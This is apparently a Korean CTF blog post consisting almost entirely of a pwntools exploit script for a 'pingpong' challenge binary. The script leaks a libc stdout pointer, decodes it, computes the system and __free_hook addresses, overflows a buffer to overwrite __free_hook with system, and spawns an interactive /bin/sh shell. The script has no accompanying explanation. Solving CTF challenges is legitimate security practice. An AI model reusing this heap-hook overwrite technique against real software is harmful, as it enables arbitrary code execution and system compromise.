1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 | from pwn import *def xor(val): lst = [] for i in range(0, len(val), 2): lst.append("0x"+val[i:i+2]) for i in range(len(lst)): if i == 1 or i == 3 or i == 5 or i == 7: lst[i] = hex(int(lst[i],16) ^ 0x20) for i in range(len(lst)): lst[i] = lst[i][2:] return int("".join(lst), 16)if __name__ == "__main__": pwn_file = "./pingpong" libc_file = "./libc.so.6" pwn_elf = ELF(pwn_file) r = process(pwn_file) libc_elf = ELF(libc_file) free_hook_offset = libc_elf.symbols['__free_hook'] system_offset = 0x380290 # stdout - system one_gadget_offset = 0x45216 binsh_offset = 0x1479c7 # binsh - system pop_rdi_offset = 0x0002155f log.info("free_hook's offset = {}".format(hex(free_hook_offset))) r.sendlineafter("ping:", "A"*56) r.recvuntil("Aa"*28) libc_stdout = u64(r.recv()[:-1].ljust(8,"\x00")) libc_stdout = xor(hex(libc_stdout)) log.info("libc_stdout = {}".format(hex(libc_stdout))) libc_system = libc_stdout - system_offset log.info("libc_system = {}".format(hex(libc_system))) libc_main = libc_system - 0x24b60 log.info("libc_main = {}".format(hex(libc_main))) binsh = libc_system + binsh_offset log.info("/bin/sh = {}".format(hex(binsh))) free_hook = libc_system + 0x381418 log.info("free_hook = {}".format(hex(free_hook))) one_gadget = libc_main + one_gadget_offset log.info("oneshot gadget = {}".format(hex(one_gadget))) payload = "A"*152 payload += p64(free_hook-0x8) r.sendline(payload) payload = "/BiN/Sh\x20" payload += p64(libc_system) r.sendline(payload) r.interactive() |
'CTF' 카테고리의 다른 글
| TJCTF 2016 oneshot (0) | 2019.01.24 |
|---|---|
| QIWICTF 2016 pwn200 (0) | 2019.01.23 |
| BCTF 2016 bcloud (0) | 2018.08.24 |
| Defcon 2014 Babyfirst heap (0) | 2018.08.16 |
| Defcon 2017 smashme (0) | 2018.08.12 |